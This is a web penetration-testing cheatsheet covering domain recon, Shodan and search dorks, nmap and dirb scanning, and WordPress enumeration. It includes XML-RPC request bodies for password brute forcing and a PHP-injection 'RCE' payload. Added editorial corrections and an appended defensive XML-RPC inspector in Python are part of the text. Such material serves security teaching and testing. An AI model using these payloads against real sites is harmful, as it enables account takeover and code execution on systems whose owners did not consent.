
.:: Web Pentest ::.

~ Cheatsheet ~
cabir - Web Pentest
Title : CheatSheet Pentest Web
Author : cabir
Date : Sept 20, 2019

Table of Contents

1. Recon
   1. Passive
   2. Active
2. CMS
   1. WordPress


## Passive

WhoIs of the host to collect information on the domain, the owner and the IP:

```shell
whois [domain]
```

Dorks (search operators):

intitle: inurl: intext: define: site: phonebook: maps: book: info: movie: related: link:

Shodan & Shodan Dorks:

- city: Find devices in a particular city. `city:"Bangalore"`
- country: Find devices in a particular country. `country:"IN"`
- geo: Find devices by giving geographical coordinates. `geo:"56.913055,118.250862"`
- hostname: Find devices matching the hostname. `server: "gws" hostname:"google"`
- net: Find devices based on an IP address or /x CIDR. `net:`
- os: Find devices based on operating system. `os:"windows 7"`
- port: Find devices based on open ports. `proftpd port:21`
- before/after: Find devices seen before or after a given time. `apache after:22/02/2009 before:14/3/2010`

Mail Search:

- TheHarvester: https://github.com/laramies/theHarvester.git
- SimplyEmail: https://github.com/SimplySecurity/SimplyEmail.git

LinkedIn:

- linkedin2username: https://github.com/initstring/linkedin2username.git


## Active

Ping to get the IP of the target:

```shell
ping -c 3 [domain]
```

nmap: scan ports and determine service & OS (the original had `-Sv` and `-o`, which nmap does not accept; `-sV` and `-oN` are the intended flags):

```shell
nmap [ip] -sS -sV -v -O -oN nmap.txt
```

- -O: Enable OS detection
- -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
- -sV: Probe open ports to determine service/version info
- -v: Verbose
- -oN: Save normal output to the given file

dirb: directory bruteforce (dirb takes the URL as its first positional argument, there is no `--url` flag):

```shell
dirb https://domain_name /usr/share/dirb/wordlists/big.txt -o dirb.txt [-X /usr/share/dirb/wordlists/extensions_common.txt]
```


## WordPress

Tools:

WPScan

```shell
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --plugins-detection aggressive [-U users.txt] -e vp,vt,tt,cb,dbe -o wpscan_results.txt -f cli-no-colour
```

WhatWeb: https://github.com/urbanadventurer/WhatWeb (aggression level is passed as `-a 3`; `-l` lists plugins and exits, so it is dropped here)

```shell
whatweb example.com -a 3 [--cookie='name1=a; name2=b'] --color=never -v > whatweb_results.txt
```



### XML-RPC

XML-RPC in WordPress is a way to normalize communication between different systems. It uses HTTP as the transport mechanism and XML as the encoding mechanism, which allows a large amount of data to be transmitted.

List all available methods:

```xml
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>
```

Possible attacks:

- BruteForce:

```xml
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>username</value></param>
    <param><value>password</value></param>
  </params>
</methodCall>
```

- RCE:

```xml
<methodCall>
  <methodName>test.method</methodName>
  <params>
    <param>
      <value><name>’,”)); phpinfo(); exit;/<b></name></value>
    </param>
  </params>
</methodCall>
```
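The defender's side of the envelopes above, as an added example that is not part of cabir's cheatsheet: a small Python inspector that parses a `<methodCall>` body, refuses any method outside an allow-list (so the `test.method` call is rejected) and flags a client that keeps sending credential-bearing `wp.getUsersBlogs` calls. The allow-list, the threshold, the client labels and the sample bodies are assumptions constructed for this example.

```python
# Added example (not part of cabir's cheatsheet): a request-body inspector a defender
# could run in front of /xmlrpc.php. It parses the <methodCall> envelope shown above,
# enforces a method allow-list and counts credential-bearing wp.getUsersBlogs calls.
import xml.etree.ElementTree as ET
from collections import defaultdict

# Assumptions: methods the site actually needs, and the per-client number of
# wp.getUsersBlogs calls above which we treat the traffic as password guessing.
ALLOWED_METHODS = {"system.listMethods", "wp.getUsersBlogs"}
BRUTE_THRESHOLD = 5

def parse_method_call(body: str):
    """Return (method_name, [param values]) or None for anything that is not a
    well-formed <methodCall> envelope."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    name = root.findtext("methodName") if root.tag == "methodCall" else None
    if not name or not name.strip():
        return None
    params = [(v.text or "") for v in root.findall("./params/param/value")]
    return name.strip(), params

class XmlRpcGuard:
    def __init__(self):
        self.login_calls = defaultdict(int)  # client -> wp.getUsersBlogs count

    def inspect(self, client: str, body: str) -> str:
        """Return 'deny', 'brute-force' or 'allow' for one request body."""
        parsed = parse_method_call(body)
        if parsed is None:
            return "deny"  # malformed, or not a methodCall at all
        method, params = parsed
        if method not in ALLOWED_METHODS:
            return "deny"  # e.g. the test.method call from the cheatsheet
        if method == "wp.getUsersBlogs" and len(params) >= 2:
            self.login_calls[client] += 1
            if self.login_calls[client] > BRUTE_THRESHOLD:
                return "brute-force"
        return "allow"

# Constructed sample bodies mirroring the envelopes in the cheatsheet.
LIST_METHODS = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
LOGIN = ("<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value>"
         "</param><param><value>guess</value></param></params></methodCall>")
ROGUE = "<methodCall><methodName>test.method</methodName><params></params></methodCall>"
```

A real deployment would also reset the per-client counter on a time window; the counter here is cumulative to keep the example short.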